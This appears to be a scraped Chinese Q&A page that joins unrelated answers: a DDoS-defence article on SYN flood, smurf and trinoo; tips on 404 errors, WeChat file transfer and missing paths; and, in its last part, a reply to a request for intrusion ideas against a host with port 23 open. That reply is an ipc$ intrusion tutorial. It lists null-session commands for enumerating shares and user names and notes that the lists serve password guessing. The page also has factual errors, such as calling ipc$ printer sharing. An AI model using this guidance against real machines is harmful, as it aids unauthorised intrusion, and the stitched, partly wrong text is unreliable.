转移共享找不到网络路径

1. 一台电脑运行一会后局域网内的其他电脑无法连接它是什么原因

考虑一下防火墙的问题，有些杀毒软件或防火墙会自动关闭共享或共享盘符，比如c$ d$ e$ 分别是默认状态下的共享盘符。你可以试一下在“开始菜单——运行”中输入cmd打开命令提示符，输入“netshare ipc$”或“netshare d$”再试一下。ipc$表示打印机共享，d$表示D盘共享

另外也有可能是受到攻击了

拒绝服务攻击是一种遍布全球的系统漏洞，黑客们正醉心于对它的研究，而无数的网络用户将成为这种攻击的受害者。Tribe Flood Network, tfn2k, smurf, targa…还有许多的程序都在被不断的开发出来。这些程序想瘟疫一样在网络中散布开来，使得我们的村落更为薄弱，我们不得不找出一套简单易用的安全解决方案来应付黑暗中的攻击。
由于我们防范手段的加强，拒绝服务攻击手法也在不断的发展。 Tribe Flood Network (tfn) 和tfn2k引入了一个新概念：分布式。这些程序可以使得分散在互连网各处的机器共同完成对一台主机攻击的操作，从而使主机看起来好象是遭到了不同位置的许多主机的攻击。这些分散的机器由几台主控制机操作进行多种类型的攻击，如UDP flood, SYN flood等。

操作系统和网络设备的缺陷在不断地被发现并被黑客所利用来进行恶意的攻击。如果我们清楚的认识到了这一点，我们应当使用下面的两步来尽量阻止网络攻击保护我们的网络: 尽可能的修正已经发现的问题和系统漏洞。
识别，跟踪或禁止这些令人讨厌的机器或网络对我们的访问。
我们先来关注第二点我们面临的主要问题是如何识别那些恶意攻击的主机，特别是使用拒绝服务攻击的机器。因为这些机器隐藏了他们自己的地址，而冒用被攻击者的地址。攻击者使用了数以千记的恶意伪造包来使我们的主机受到攻击。"tfn2k"的原理就象上面讲的这么简单，而他只不过又提供了一个形象的界面。假如您遭到了分布式的拒绝服务攻击，实在是很难处理。

有一些简单的手法来防止拒绝服务式的攻击。最为常用的一种当然是时刻关注安全信息以期待最好的方法出现。管理员应当订阅安全信息报告，实时的关注所有安全问题的发展。：） 第二步是应用包过滤的技术，主要是过滤对外开放的端口。这些手段主要是防止假冒地址的攻击，使得外部机器无法假冒内部机器的地址来对内部机器发动攻击。

对于应该使用向内的包过滤还是使用向外的包过滤一直存在着争论。RFC 2267建议在全球范围的互连网上使用向内过滤的机制，但是这样会带来很多的麻烦，在中等级别的路由器上使用访问控制列表不会带来太大的麻烦，但是已经满载的骨干路由器上会受到明显的威胁。另一方面，ISP如果使用向外的包过滤措施会把过载的流量转移到一些不太忙的设备上。 ISP也不关心消费者是否在他们的边界路由器上使用这种技术。当然，这种过滤技术也并不是万无一失的，这依赖于管理人员采用的过滤机制。

1．ICMP防护措施

ICMP最初开发出来是为了"帮助"网络，经常被广域网管理员用作诊断工具。但今天各种各样的不充分的ICMP被滥用，没有遵守RFC 792原先制订的标准，要执行一定的策略可以让它变得安全一些。

入站的ICMP时间标记（Timestamp）和信息请求(Information Request)数据包会得到响应，带有非法或坏参数的伪造数据包也能产生ICMP参数问题数据包，从而允许另外一种形式的主机搜寻。这仍使得站点没有得到适当保护。

以秘密形式从主方到客户方发布命令的一种通用方法，就是使用ICMP Echo应答数据包作为载波。 回声应答本身不能回答，一般不会被防火墙阻塞。

首先，我们必须根据出站和入站处理整个的"ICMP限制"问题。ICMP回声很容易验证远程机器，但出站的ICMP回声应该被限制只支持个人或单个服务器/ICMP代理（首选）。

如果我们限制ICMP回声到一个外部IP地址（通过代理），则我们的ICMP回声应答只能进入我们网络中预先定义的主机。

重定向通常可以在路由器之间找到，而不是在主机之间。防火墙规则应该加以调整，使得这些类型的ICMP只被允许在需要信息的网际连接所涉及的路由器之间进行。

建议所有对外的传输都经过代理，对内的ICMP传输回到代理地址的时候要经过防火墙。这至少限制了ICMP超时数据包进入一个内部地址，但它可能阻塞超时数据包。

当ICMP数据包以不正确的参数发送时，会导致数据包被丢弃，这时就会发出ICMP参数出错数据包。主机或路由器丢弃发送的数据包，并向发送者回送参数ICMP出错数据包，指出坏的参数。

总的来说，只有公开地址的服务器（比如Web、电子邮件和FTP服务器）、防火墙、联入因特网的路由器有真正的理由使用ICMP与外面的世界对话。如果调整适当，实际上所有使用进站和出站ICMP的隐密通讯通道都会被中止。

2. SYN Flood防范

SYN Flood是当前最流行的DoS（拒绝服务攻击）与DdoS（分布式拒绝服务攻击）的方式之一，这是一种利用TCP协议缺陷，发送大量伪造的TCP连接请求，从而使得被攻击方资源耗尽（CPU满负荷或内存不足）的攻击方式。对于SYN Flood攻击，目前尚没有很好的监测和防御方法，不过如果系统管理员熟悉攻击方法和系统架构，通过一系列的设定，也能从一定程度上降低被攻击系统的负荷，减轻负面的影响。

一般来说，如果一个系统（或主机）负荷突然升高甚至失去响应，使用Netstat 命令能看到大量SYN_RCVD的半连接（数量>500或占总连接数的10%以上），可以认定，这个系统（或主机）遭到了SYN Flood攻击。遭到SYN Flood攻击后，首先要做的是取证，通过Netstat –n –p tcp >resault.txt记录目前所有TCP连接状态是必要的，如果有嗅探器，或者TcpDump之类的工具，记录TCP SYN报文的所有细节也有助于以后追查和防御，需要记录的字段有：源地址、IP首部中的标识、TCP首部中的序列号、TTL值等，这些信息虽然很可能是攻击者伪造的，但是用来分析攻击者的心理状态和攻击程序也不无帮助。特别是TTL值，如果大量的攻击包似乎来自不同的IP但是TTL值却相同，我们往往能推断出攻击者与我们之间的路由器距离，至少也可以通过过滤特定TTL值的报文降低被攻击系统的负荷（在这种情况下TTL值与攻击报文不同的用户就可以恢复正常访问）。从防御角度来说，有几种简单的解决方法：

2.1缩短SYN Timeout时间:由于SYN Flood攻击的效果取决于服务器上保持的SYN半连接数，这个值=SYN攻击的频度 x SYN Timeout，所以通过缩短从接收到SYN报文到确定这个报文无效并丢弃改连接的时间，例如设置为20秒以下（过低的SYN Timeout设置可能会影响客户的正常访问），可以成倍的降低服务器的负荷。

2.2设置SYN Cookie:就是给每一个请求连接的IP地址分配一个Cookie，如果短时间内连续受到某个IP的重复SYN报文，就认定是受到了攻击，以后从这个IP地址来的包会被丢弃。可是上述的两种方法只能对付比较原始的SYN Flood攻击，缩短SYN Timeout时间仅在对方攻击频度不高的情况下生效，SYN Cookie更依赖于对方使用真实的IP地址，如果攻击者以数万/秒的速度发送SYN报文，同时利用SOCK_RAW随机改写IP报文中的源地址，以上的方法将毫无用武之地。

2.3负反馈策略:参考一些流行的操作系统，如Windows2000的SYN攻击保护机制：正常情况下，OS对TCP连接的一些重要参数有一个常规的设置： SYN Timeout时间、SYN-ACK的重试次数、SYN报文从路由器到系统再到Winsock的延时等等。这个常规设置针对系统优化，可以给用户提供方便快捷的服务；一旦服务器受到攻击，SYN Half link 的数量超过系统中TCP活动 Half Connction最大连接数的设置，系统将会认为自己受到了SYN Flood攻击，并将根据攻击的判断情况作出反应：减短SYN Timeout时间、减少SYN-ACK的重试次数、自动对缓冲区中的报文进行延时等等措施，力图将攻击危害减到最低。如果攻击继续，超过了系统允许的最大Half Connection 值，系统已经不能提供正常的服务了，为了保证系统不崩溃，可以将任何超出最大Half Connection 值范围的SYN报文随机丢弃，保证系统的稳定性。

所以，可以事先测试或者预测该主机在峰值时期的Half Connction 的活动数量上限，以其作为参考设定TCP活动 Half Connction最大连接数的值，然后再以该值的倍数（不要超过2）作为TCP最大Half Connection值，这样可以通过负反馈的手段在一定程度上阻止SYN攻击。

2.4退让策略:退让策略是基于SYN Flood攻击代码的一个缺陷，我们重新来分析一下SYN Flood攻击者的流程：SYN Flood程序有两种攻击方式，基于IP的和基于域名的，前者是攻击者自己进行域名解析并将IP地址传递给攻击程序，后者是攻击程序自动进行域名解析，但是它们有一点是相同的，就是一旦攻击开始，将不会再进行域名解析，我们的切入点正是这里：假设一台服务器在受到SYN Flood攻击后迅速更换自己的IP地址，那么攻击者仍在不断攻击的只是一个空的IP地址，并没有任何主机，而防御方只要将DNS解析更改到新的IP地址就能在很短的时间内（取决于DNS的刷新时间）恢复用户通过域名进行的正常访问。为了迷惑攻击者，我们甚至可以放置一台“牺牲”服务器让攻击者满足于攻击的“效果”（由于DNS缓冲的原因，只要攻击者的浏览器不重起，他访问的仍然是原先的IP地址）。

2.5分布式DNS负载均衡:在众多的负载均衡架构中，基于DNS解析的负载均衡本身就拥有对SYN Flood的免疫力，基于DNS解析的负载均衡能将用户的请求分配到不同IP的服务器主机上，攻击者攻击的永远只是其中一台服务器，一来这样增加了攻击者的成本，二来过多的DNS请求可以帮助我们追查攻击者的真正踪迹（DNS请求不同于SYN攻击，是需要返回数据的，所以很难进行IP伪装）。

2.6防火墙Qos:对于防火墙来说，防御SYN Flood攻击的方法取决于防火墙工作的基本原理，一般说来，防火墙可以工作在TCP层之上或IP层之下，工作在TCP层之上的防火墙称为网关型防火墙，网关型防火墙布局中，客户机与服务器之间并没有真正的TCP连接，客户机与服务器之间的所有数据交换都是通过防火墙代理的，外部的DNS解析也同样指向防火墙，所以如果网站被攻击，真正受到攻击的是防火墙，这种防火墙的优点是稳定性好，抗打击能力强，但是因为所有的TCP报文都需要经过防火墙转发，所以效率比较低由于客户机并不直接与服务器建立连接，在TCP连接没有完成时防火墙不会去向后台的服务器建立新的TCP连接，所以攻击者无法越过防火墙直接攻击后台服务器，只要防火墙本身做的足够强壮，这种架构可以抵抗相当强度的SYN Flood攻击。但是由于防火墙实际建立的TCP连接数为用户连接数的两倍（防火墙两端都需要建立TCP连接），同时又代理了所有的来自客户端的TCP请求和数据传送，在系统访问量较大时，防火墙自身的负荷会比较高，所以这种架构并不能适用于大型网站。（我感觉，对于这样的防火墙架构，使用TCP_STATE攻击估计会相当有效:）

工作在IP层或IP层之下的称为路由型防火墙，其工作原理有所不同：客户机直接与服务器进行TCP连接，防火墙起的是路由器的作用，它截获所有通过的包并进行过滤，通过过滤的包被转发给服务器，外部的DNS解析也直接指向服务器，这种防火墙的优点是效率高，可以适应100Mbps-1Gbps的流量，但是这种防火墙如果配置不当，不仅可以让攻击者越过防火墙直接攻击内部服务器，甚至有可能放大攻击的强度，导致整个系统崩溃。

在这两种基本模型之外，有一种新的防火墙模型，它集中了两种防火墙的优势，这种防火墙的工作原理如下所示：

第一阶段，客户机请求与防火墙建立连接：
第二阶段，防火墙伪装成客户机与后台的服务器建立连接
第三阶段，之后所有从客户机来的TCP报文防火墙都直接转发给后台的服务器
这种结构吸取了上两种防火墙的优点，既能完全控制所有的SYN报文，又不需要对所有的TCP数据报文进行代理，是一种两全其美的方法。近来，国外和国内的一些防火墙厂商开始研究带宽控制技术，如果能真正做到严格控制、分配带宽，就能很大程度上防御绝大多数的SYN攻击。

3.Smurf防范的几种方法

阻塞Smurf攻击的源头:Smurf攻击依靠攻击者的力量使用欺骗性源地址发送echo请求。用户可以使用路由路的访问保证内部网络中发出的所有传输信息都具有合法的源地址，以防止这种攻击。这样可以使欺骗性分组无法找到反弹站点。

阻塞Smurf的反弹站点:用户可以有两种选择以阻塞Smurf攻击的反弹站点。第一种方法可以简单地阻塞所有入站echo请求，这们可以防止这些分组到达自己的网络。如果不能阻塞所有入站echo请求，用户就需要让自己的路由器把网络广播地址映射成为LAN广播地址。制止了这个映射过程，自己的系统就不会再收到这些echo请求。

阻止Smurf平台:为防止系统成为 smurf攻击的平台，要将所有路由器上IP的广播功能都禁止。一般来讲，IP广播功能并不需要。 如果攻击者要成功地利用你成为攻击平台，你的路由器必须要允许信息包以不是从你的内网中产生的源地址离开网络。配置路由器，让它将不是由你的内网中生成的信息包过滤出去，这是有可能做到的。这就是所谓的网络出口过滤器功能。

防止Smurf攻击目标站点:除非用户的ISP愿意提供帮助，否则用户自己很难防止Smurf对自己的WAN接连线路造成的影响。虽然用户可以在自己的网络设备中阻塞这种传输，但对于防止Smurf吞噬所有的WAN带宽已经太晚了。但至少用户可以把Smurf的影响限制在外围设备上。通过使用动态分组过滤技术，或者使用防火墙，用户可以阻止这些分组进入自己的网络。防火墙的状态表很清楚这些攻击会话不是本地网络中发出的（状态表记录中没有最初的echo请求记录），因些它会象对待其它欺骗性攻击行为那样把这样信息丢弃。

4.UDP Flood防范

以前文提到的trinoo为例，分析如下：

在master程序与代理程序的所有通讯中，trinoo都使用了UDP协议。入侵检测软件能够寻找使用UDP协议的数据流(类型17)。
Trinoo master程序的监听端口是27655，攻击者一般借助telnet通过TCP连接到master程序所在计算机。入侵检测软件能够搜索到使用TCP (类型6)并连接到端口27655的数据流。
所有从master程序到代理程序的通讯都包含字符串"l44"，并且被引导到代理的UDP 端口27444。入侵检测软件检查到UDP 端口27444的连接，如果有包含字符串l44的信息包被发送过去，那么接受这个信息包的计算机可能就是DDoS代理。
Master和代理之间通讯受到口令的保护，但是口令不是以加密格式发送的，因此它可以被“嗅探”到并被检测出来。使用这个口令以及来自Dave Dittrich的trinot脚本http://staff.washington.e/dittrich/misc/trinoo.analysis，要准确地验证出trinoo代理的存在是很可能的。
一旦一个代理被准确地识别出来，trinoo网络就可以安装如下步骤被拆除：

在代理daemon上使用"strings"命令，将master的IP地址暴露出来。
与所有作为trinoo master的机器管理者联系，通知它们这一事件。
在master计算机上，识别含有代理IP地址列表的文件(默认名"...")，得到这些计算机的IP地址列表。
向代理发送一个伪造"trinoo"命令来禁止代理。通过crontab 文件(在UNIX系统中)的一个条目，代理可以有规律地重新启动， 因此，代理计算机需要一遍一遍地被关闭，直到代理系统的管理者修复了crontab文件为止。
检查master程序的活动TCP连接，这能显示攻击者与trinoo master程序之间存在的实时连接。
如果网络正在遭受trinoo攻击，那么系统就会被UDP 信息包所淹没。Trinoo从同一源地址向目标主机上的任意端口发送信息包。探测trinoo就是要找到多个UDP信息包，它们使用同一来源IP地址、同一目的IP地址、同一源端口，但是不同的目的端口。
在http://www.fbi.gov/nipc/trinoo.htm上有一个检测和根除trinoo的自动程序。
5.使用DNS来跟踪匿名攻击

从一个网管的观点来看，防范的目标并不是仅仅阻止拒绝服务攻击，而是要追究到攻击的发起原因及操作者。当网络中有人使用假冒了源地址的工具（如tfn2k）时，我们虽然没有现成的工具来确认它的合法性，但我们可以通过使用DNS来对其进行分析：

假如攻击者选定了目标www.ttttt.com，他必须首先发送一个DNS请求来解析这个域名，通常那些攻击工具工具会自己执行这一步，调用gethostbyname()函数或者相应的应用程序接口，也就是说，在攻击事件发生前的DNS请求会提供给我们一个相关列表，我们可以利用它来定位攻击者。

使用现成工具或者手工读取DNS请求日志，来读取DNS可疑的请求列表都是切实可行的，然而，它有三个主要的缺点：

攻击者一般会以本地的DNS为出发点来对地址进行解析查询，因此我们查到的DNS请求的发起者有可能不是攻击者本身，而是他所请求的本地DNS服务器。尽管这样，如果攻击者隐藏在一个拥有本地DNS的组织内，我们就可以把该组织作为查询的起点。

攻击者有可能已经知道攻击目标的IP地址，或者通过其他手段（host, ping）知道了目标的IP地址，亦或是攻击者在查询到IP地址后很长一段时间才开始攻击，这样我们就无法从DNS请求的时间段上来判断攻击者（或他们的本地服务器）。

DNS对不同的域名都有一个却省的存活时间，因此攻击者可以使用存储在DNS缓存中的信息来解析域名。为了更好做出详细的解析记录，您可以把DNS却省的TTL时间缩小，但这样会导致DNS更多的去查询所以会加重网络带宽的使用。

6.主机防范

所有对因特网提供公开服务的主机都应该加以限制。下面建议的策略可以保护暴露在因特网上的主机。

将所有公开服务器与DMZ隔离
提供的每种服务都应该有自己的服务器。
如果使用Linux（建议这样做），你就可以使用一个或几个"缓冲溢出/堆栈执行"补丁或增强来防止绝大多数（如果不能全部）本地或远程缓冲溢出，以避免这些溢出危及根的安全。强烈建议将Solar Designer的补丁包括在附加的安全特征中。
使用SRP（Secure Remote Password 安全远程口令）代替SSH。
限制只有内部地址才能访问支持SRP的telnet和FTP守护程序，强调只有支持SRP的客户端才可以与这些程序对话。如果你必须为公开访问运行常规的FTP（比如匿名FTP），可以在另一个端口运行SRP FTP。
使用可信任的路径。根用户拥有的二进制执行程序应该放置的目录的所有权应该是根，不能让全部用户或组都有写权限。如果有必要的话，为了强制这样做，你可以改变内核。
使用内置防火墙功能。通过打开防火墙规则，可以经常利用内核状态表。
使用一些防端口扫描措施。这可以使用Linux的后台程序功能或通过修改内核实现。
使用Tripwire 和相同作用的软件来帮助发觉对重要文件的修改。
7.电子邮件炸弹防护

对于保护电子件的安全来说，了解一下电子邮件的发送过程是很有必要的。它的过程是这样的，当有用户将邮件写好之后首先连接到邮件服务器上，当邮件服务器有响应时便会启动邮件工具，调用路由（这里指的是邮件的路由）程序Sendmail进行邮件路由，根据邮件所附的接收地址中指定的接收主机，比如： [email protected]里的163.net，与位于主机163.net电子邮件后台守护程序建立25端口的TCP连接，建立后双方按照SMTP协议进行交互第进，从而完成邮件的投递工作，接收方电子邮件接收邮件后，再根据接收用户名称，放置在系统的邮件目录里，如/usr/电子邮件目录的semxa文件中。接收用户同样使用邮件工具获取和阅读这些已投递的邮件。如果投递失败的话，这些邮件将重新返回到发送方。实际上电子邮件的发送过程要比这里所说的更为复杂些，在过程里将会涉及很多的配置文件。在现在的SMTP协议是一个基于文本的协议，理解和实现都相对比较简单些，你可以使用telnet直接登陆到邮件服务器的25端口（由LANA授权分配给SMTP协议）进行交互。

保护电子信箱邮件的信息安全最有效的办法就是使用加密的签名技术，像PGP来验证邮件，通过验证可以保护到信息是从正确的地方发来的，而且在传送过程中不被修改。但是这就不是个人用户所能达到的了，因为PGP比较复杂。

就电子邮件炸弹而言，保护还是可以做得很好的。因为它的复杂性不是很高，多的仅仅是垃圾邮件而已。你可以使用到http://semxa.kstar.com/hacking/echom201.zip E-mail Chomper（砍信机）来保护自己。但是目前就国内用户而言，大多用户所使用的都是免费的邮箱，像yeah.net、163.net、263.net等，即便是有人炸顶多也是留在邮件服务器上了，危害基本上是没有的。如果是用pop3接的话，可以用Outlook或Foxmail等pop的收信工具来接收的mail，大多用户使用的是windows的Outlook Express，可以在“工具－收件箱助理”中设置过滤。对于各种利用电子邮件而传播的Email蠕虫病毒和对未知的Emai蠕虫病毒你可以使用防电子邮件病毒软件来防护。

另外，邮件系统管理员可以使用“黑名单”来过滤一些垃圾信件。对于不同的邮件系统，大都可以在网络上找到最新的黑名单程序或者列表。

8.使用ngrep工具来处理tfn2k攻击

根据使用DNS来跟踪tfn2k驻留程序的原理，现在已经出现了称为ngrep的实用工具。经过修改的ngrep可以监听大约五种类型的tfn2k拒绝服务攻击(targa3, SYN flood, UDP flood, ICMP flood 和 smurf)，它还有一个循环使用的缓存用来记录DNS和ICMP请求。如果ngrep发觉有攻击行为的话，它会将其缓存中的内容打印出来并继续记录ICMP回应请求。假如攻击者通过ping目标主机的手段来铆定攻击目标的话，在攻击过程中或之后记录ICMP的回应请求是一种捕获粗心的攻击者的方法。由于攻击者还很可能使用其他的服务来核实其攻击的效果（例如web），所以对其他的标准服务也应当有尽量详细的日志记录。

还应当注意，ngrep采用的是监听网络的手段，因此，ngrep无法在交换式的环境中使用。但是经过修改的ngrep可以不必和你的DNS在同一个网段中，但是他必须位于一个可以监听到所有DNS请求的位置。经过修改的ngrep也不关心目标地址，您可以把它放置在DMZ网段，使它能够检查横贯该网络的tfn2k攻击。从理论上讲，它也可以很好的检测出对外的tfn2k攻击。

在ICMP flood事件中，ICMP回应请求的报告中将不包括做为tfn2k flood一部分的ICMP包。Ngrep还可以报告检测出来的除smurf之外的攻击类型（TARGA, UDP, SYN, ICMP等）。混合式的攻击在缺省情况下表现为ICMP攻击，除非你屏蔽了向内的ICMP回应请求，这样它就表现为UDP或SYN攻击。这些攻击的结果都是基本类似的。

9.有关入侵检测系统的建议

由于许多用来击败基于网络的入侵检测系统的方法对绝大多数商业入侵检测系统产品仍然是有效的，因此建议入侵检测系统应该至少有能重组或发觉碎片的自寻址数据包。下面是部分要注意的事项：

确信包括了现有的所有规则，包括一些针对分布式拒绝服务攻击的新规则。
如果遵循了ICMP建议项，许多ICMP会被阻塞，入侵检测系统触发器存在许多机会。任何通常情况下要被阻塞的入站或出站的ICMP数据包可以被触发。
"任何"被你用防火墙分离的网络传输都可能是一个潜在的IDS触发器。
如果你的入侵检测系统支持探测长时间周期的攻击，确信没有把允许通过防火墙的被信任主机排除在外。这也包括虚拟专用网。
如果你能训练每个使用ping的用户在ping主机时使用小数据包，就可能设置入侵检测系统寻找超29字节的Echo和Echo应答数据包。

2. 404 not found怎么解决404页面怎么做

1、首先，我们要确认我们的计算机网络是否连接正确，当我们的网络出现问题时比如遇到DNS劫持等情况时，我们有可能会出现“ERROR 404--NOT FOUND”的网页提示。解决DNS劫持的方法就是，我们需要将我们计算机的DNS服务器地址进行重新设置。

3. 没有网络，怎样将微信上的文件转移到计算机上

1，把微信收藏的东西转到电脑方法，可以在电脑上找到微信我的收藏在手机上的存储路径。
2，然后将其直接拷贝的电脑上，路径如下：
图片：Tencent/Micromsg/camera里面。
3，微信安装在手机就在手机内存里找，安装在卡上就在存储卡的这个。
4，也可以使用微信网页版等根据不同格式的文件可有多种方式转移，直接下载。
5，也可以将文件发送到腾讯或新浪微博，发送到邮件，最简单的就是用USB将手机和电脑连接。
6，将收藏文件下载到手机、电脑启用无线WIFI，并登陆QQ（保证手机WIFI和电脑的WIFI是同一个）在我的好友分组上面有一栏，我的设备；先用电脑随便给手机发个东西，手机有我的电脑，电脑和手机就可以互传文件了。

4. 网络电话无法打开文件系统找不到指定的路径

一般提示系统找不到指定路径多半是原系统文件被删除或者文件目录被转移。
可以用可执行文件名的查找。在电脑中全盘搜索这个名字，找到后可以双击执行，这个文件看是否可以运行，如果不能运行的话就要重新安装这个软件了。
要手动确认对应的可执行文件。另外，右键点快捷方式，选属性，在常规里就有一项目标路径，这就是该快捷方式对应的文件。一般都是exe文件。

5. 有开了23端口的主机 求入侵思路

这多是本人多年下来的经验。

网上关于 ipc$ 入侵的文章可谓多如牛毛，攻击步骤甚至已经成为了固化的模式，因此也没人愿意再把这已经成为定式的东西拿出来摆弄。不过话虽这样说，我认为这些文章讲解的并不详细，一些内容甚至是错误的，以致对 ipc$ 的提问几乎占了各大安全论坛讨论区的半壁江山，而且这些问题常常都是重复的，严重影响了论坛质量和学习效率，因此我总结了这篇文章，希望能把 ipc$ 这部分东西尽量说清楚。
注意：本文所讨论的各种情况均默认发生在 win NT/2000 环境下， win98 将不在此次讨论之列。
二 什么是 ipc$
IPC$(Internet Process Connection) 是共享 " 命名管道 " 的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。 IPC$ 是 NT/2000 的一项新功能，它有一个特点，即在同一时间内，两个 IP 之间只允许建立一个连接。 NT/2000 在提供了 ipc$ 功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享 (c$,d$,e$ …… ) 和系统目录 winnt 或 windows(admin$) 共享。所有的这些，微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系统安全性的降低。
平时我们总能听到有人在说 ipc$ 漏洞， ipc$ 漏洞，其实 ipc$ 并不是一个真正意义上的漏洞 , 我想之所以有人这么说，一定是指微软自己安置的那个‘后门'：空会话（ Null session ）。那么什么是空会话呢？
三 什么是空会话
在介绍空会话之前，我们有必要了解一下一个安全会话是如何建立的。
在 Windows NT 4.0 中是使用挑战响应协议与远程机器建立一个会话的，建立成功的会话将成为一个安全隧道，建立双方通过它互通信息，这个过程的大致顺序如下：
1 ）会话请求者（客户）向会话接收者（服务器）传送一个数据包，请求安全隧道的建立；
2 ）服务器产生一个随机的 64 位数（实现挑战）传送回客户；
3 ）客户取得这个由服务器产生的 64 位数，用试图建立会话的帐号的口令打乱它，将结果返回到服务器（实现响应）；
4 ）服务器接受响应后发送给本地安全验证（ LSA ）， LSA 通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号，核实本地发生；如果请求的帐号是一个域的帐号，响应传送到域控制器去核实。当对挑战的响应核实为正确后，一个访问令牌产生，然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。
以上是一个安全会话建立的大致过程，那么空会话又如何呢？
空会话是在没有信任的情况下与服务器建立的会话（即未提供用户名与密码），但根据 WIN2000 的访问控制模型，空会话的建立同样需要提供一个令牌，可是空会话在建立过程中并没有经过用户信息的认证，所以这个令牌中不包含用户信息，因此，这个会话不能让系统间发送加密信息，但这并不表示空会话的令牌中不包含安全标识符 SID （它标识了用户和所属组），对于一个空会话， LSA 提供的令牌的 SID 是 S- 1-5-7 ，这就是空会话的 SID ，用户名是： ANONYMOUS LOGON （这个用户名是可以在用户列表中看到的，但是是不能在 SAM 数据库中找到，属于系统内置的帐号），这个访问令牌包含下面伪装的组：
Everyone
Network
在安全策略的限制下，这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢？

四 空会话可以做什么

对于 NT ，在默认安全设置下，借助空连接可以列举目标主机上的用户和共享，访问 everyone 权限的共享，访问小部分注册表等，并没有什么太大的利用价值；对 2000 作用更小，因为在 Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表，而且实现起来也不方便，需借助工具。
从这些我们可以看到，这种非信任会话并没有多大的用处，但从一次完整的 ipc$ 入侵来看，空会话是一个不可缺少的跳板，因为我们从它那里可以得到户列表，而大多数弱口令扫描工具就是利用这个用户列表来进行口令猜解的，成功的导出用户列表大大增加了猜解的成功率，仅从这一点，足以说明空会话所带来的安全隐患，因此说空会话毫无用处的说法是不正确的。以下是空会话中能够使用的一些具体命令：
1 首先，我们先建立一个空会话（当然，这需要目标开放 ipc$ ）
命令： net use \\ip\ipc$ "" /user:""
注意：上面的命令包括四个空格， net 与 use 中间有一个空格， use 后面一个，密码左右各一个空格。
2 查看远程主机的共享资源
命令： net view \\ip
解释：前提是建立了空连接后，用此命令可以查看远程主机的共享资源，如果它开了共享，可以得到如下面的结果，但此命令不能显示默认共享。
在 \\*.*.*.* 的共享资源
资源共享名 类型 用途 注释
-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。
3 查看远程主机的当前时间
命令： net time \\ip
解释：用此命令可以得到一个远程主机的当前时间。
4 得到远程主机的 NetBIOS 用户名列表（需要打开自己的 NBT ）
命令： nbtstat -A ip
用此命令可以得到一个远程主机的 NetBIOS 用户名列表，返回如下结果：
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H < 1C > GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services < 1C > GROUP Registered
IS~SERVER......<00> UNIQUE Registered
MAC Address = 00-50-8B -9A -2D-37
以上就是我们经常使用空会话做的事情，好像也能获得不少东西哟，不过要注意一点：建立 IPC$ 连接的操作会在 Event Log 中留下记录，不管你是否登录成功。 好了，那么下面我们就来看看 ipc$ 所使用的端口是什么？
五 ipc$ 所使用的端口
首先我们来了解一些基础知识：
1 SMB:(Server Message Block) Windows 协议族，用于文件打印共享的服务；
2 NBT:(NETBios Over TCP/IP) 使用 137 （ UDP ） 138 （ UDP ） 139 （ TCP ）端口实现基于 TCP/IP 协议的 NETBIOS 网络互联。
3 在 WindowsNT 中 SMB 基于 NBT 实现，即使用 139 （ TCP ）端口；而在 Windows2000 中， SMB 除了基于 NBT 实现，还可以直接通过 445 端口实现。
有了这些基础知识，我们就可以进一步来讨论访问网络共享对端口的选择了：
对于 win2000 客户端（发起端）来说：
1 如果在允许 NBT 的情况下连接服务器时，客户端会同时尝试访问 139 和 445 端口，如果 445 端口有响应，那么就发送 RST 包给 139 端口断开连接，用 455 端口进行会话，当 445 端口无响应时，才使用 139 端口，如果两个端口都没有响应，则会话失败；
2 如果在禁止 NBT 的情况下连接服务器时，那么客户端只会尝试访问 445 端口，如果 445 端口无响应，那么会话失败。
对于 win2000 服务器端来说：
1 如果允许 NBT, 那么 UDP 端口 137, 138, TCP 端口 139, 445 将开放（ LISTENING ）；
2 如果禁止 NBT ，那么只有 445 端口开放。
我们建立的 ipc$ 会话对端口的选择同样遵守以上原则。显而易见，如果远程服务器没有监听 139 或 445 端口， ipc$ 会话是无法建立的。
六 ipc 管道在 hack 攻击中的意义
ipc 管道本来是微软为了方便管理员进行远程管理而设计的，但在入侵者看来，开放 ipc 管道的主机似乎更容易得手。通过 ipc 管道，我们可以远程调用一些系统函数（大多通过工具实现，但需要相应的权限），这往往是入侵成败的关键。如果不考虑这些，仅从传送文件这一方面， ipc 管道已经给了入侵者莫大的支持，甚至已经成为了最重要的传输手段，因此你总能在各大论坛上看到一些朋友因为打不开目标机器的 ipc 管道而一筹莫展大呼救命。当然，我们也不能忽视权限在 ipc 管道中扮演的重要角色，想必你一定品尝过空会话的尴尬，没有权限，开启管道我们也无可奈何。但入侵者一旦获得了管理员的权限，那么 ipc 管道这把双刃剑将显示出它狰狞的一面。
七 ipc$ 连接失败的常见原因
以下是一些常见的导致 ipc$ 连接失败的原因：
1 IPC 连接是 Windows NT 及以上系统中特有的功能，由于其需要用到 Windows NT 中很多 DLL 函数，所以不能在 Windows 9.x/Me 系统中运行，也就是说只有 nt/2000/xp 才可以相互建立 ipc$ 连接， 98/me 是不能建立 ipc$ 连接的；
2 如果想成功的建立一个 ipc$ 连接，就需要响应方开启 ipc$ 共享，即使是空连接也是这样，如果响应方关闭了 ipc$ 共享，将不能建立连接；
3 连接发起方未启动 Lanmanworkstation 服务（显示名为： Workstation ）：它提供网络链结和通讯，没有它发起方无法发起连接请求；
4 响应方未启动 Lanmanserver 服务（显示名为： Server ）：它提供了 RPC 支持、文件、打印以及命名管道共享， ipc$ 依赖于此服务，没有它主机将无法响应发起方的连接请求，不过没有它仍可发起 ipc$ 连接；
